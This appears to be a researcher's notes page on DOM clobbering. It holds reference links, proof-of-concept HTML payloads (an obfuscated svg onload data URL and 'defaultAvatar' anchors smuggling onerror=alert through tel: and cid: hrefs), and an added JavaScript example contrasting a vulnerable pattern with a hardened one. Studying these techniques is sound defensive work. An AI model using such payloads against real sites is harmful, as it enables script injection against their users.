DOM clobbering

DOM clobbering is a technique in which HTML is injected into a page to manipulate the DOM and ultimately change the behavior of JavaScript on the page.

In this way, a global variable or a property of an object can be clobbered, that is, overwritten with a DOM node or an HTML collection.

https://www.youtube.com/watch?v=eWD4LH5W2Es
https://www.youtube.com/watch?v=7eZnQgluz1Q&list=PLWvfB8dRFqba4RedkuUDWMEkAkP8cdZCW
https://www.youtube.com/watch?v=vgBAUvPJnT8
https://www.youtube.com/watch?v=sqlI-Tm-Bpg
https://bugology.intigriti.io/intigriti-monthly-challenges/0124
https://challenge-0124.intigriti.io/
https://github.com/SoheilKhodayari/TheThing
https://domclob.xyz/domc_wiki/techniques/windowNamedAccess.html
https://portswigger.net/web-security/dom-based/dom-clobbering
https://research.securitum.com/xss-in-amp4email-dom-clobbering/

<li><a href="https://example.com">Website</a></li>
<li><a href="mailto:m.bluth@example.com">Email</a></li>
<li><a href="tel:+123456789">Phone</a></li>  
<li><a href="cid:image-ref">Phone</a></li>  
<math><a xlink:href="//jsfiddle.net/t846h/">click
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

// Check how href behaves on different attributes

<a id="defaultAvatar"><a id="defaultAvatar" href="tel:asdf&quot;onerror=alert(123)//" name="avatar">
<a id="defaultAvatar"><a id="defaultAvatar" href="cid:asdf&quot;onerror=alert(123)//" name="avatar">
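The two `defaultAvatar` payloads above, traced through the kind of script they target and through a hardened read, as an added example (not code from this page). The `window.defaultAvatar || {...}` pattern, the default path, the `app.invalid` base URL and all function names are assumptions, and plain objects stand in for DOM nodes so the code runs in Node.

```javascript
// Added example: plain-object stand-ins for browser objects so it runs in Node.
const DEFAULT_AVATAR = '/img/avatar-default.svg';      // hypothetical path
const PAGE_HREF = 'cid:asdf"onerror=alert(123)//';     // href from the page, entity-decoded

// Stand-in for an <a> element: used as a string, an anchor yields its href.
// Assumption: the double quote comes back unencoded for this scheme.
function fakeAnchor(href) {
  return { nodeType: 1, href, toString() { return href; } };
}

// Stand-in for window after injection: two elements sharing id="defaultAvatar"
// resolve to a collection, and name="avatar" becomes a property of it.
function clobberedWindow(href) {
  return { defaultAvatar: { length: 2, avatar: fakeAnchor(href) } };
}

// Assumed vulnerable pattern: trusts whatever the global name resolves to.
function renderAvatarUnsafe(win) {
  const cfg = win.defaultAvatar || { avatar: DEFAULT_AVATAR };
  return '<img src="' + cfg.avatar + '">';
}

// Hardened read: accept only a string that parses as an http(s) URL.
function safeAvatarUrl(value) {
  if (typeof value !== 'string') return DEFAULT_AVATAR; // nodes, collections
  let url;
  try { url = new URL(value, 'https://app.invalid/'); } catch { return DEFAULT_AVATAR; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return DEFAULT_AVATAR;
  return url.href;
}

// Escape for an attribute value so a stray quote cannot close the attribute.
function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

function renderAvatarSafe(cfg) {
  const own = cfg && Object.prototype.hasOwnProperty.call(cfg, 'avatar');
  return '<img src="' + escapeAttr(safeAvatarUrl(own ? cfg.avatar : undefined)) + '">';
}

const clobbered = clobberedWindow(PAGE_HREF);
console.log(renderAvatarUnsafe(clobbered));             // attribute is broken out of
console.log(renderAvatarSafe(clobbered.defaultAvatar)); // falls back to the default
```

In a real page the stronger fix is to keep the configuration in a module-scoped constant and never read it from `window`; the type and scheme checks then act as a second layer.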

https://portswigger.net/web-security/dom-based
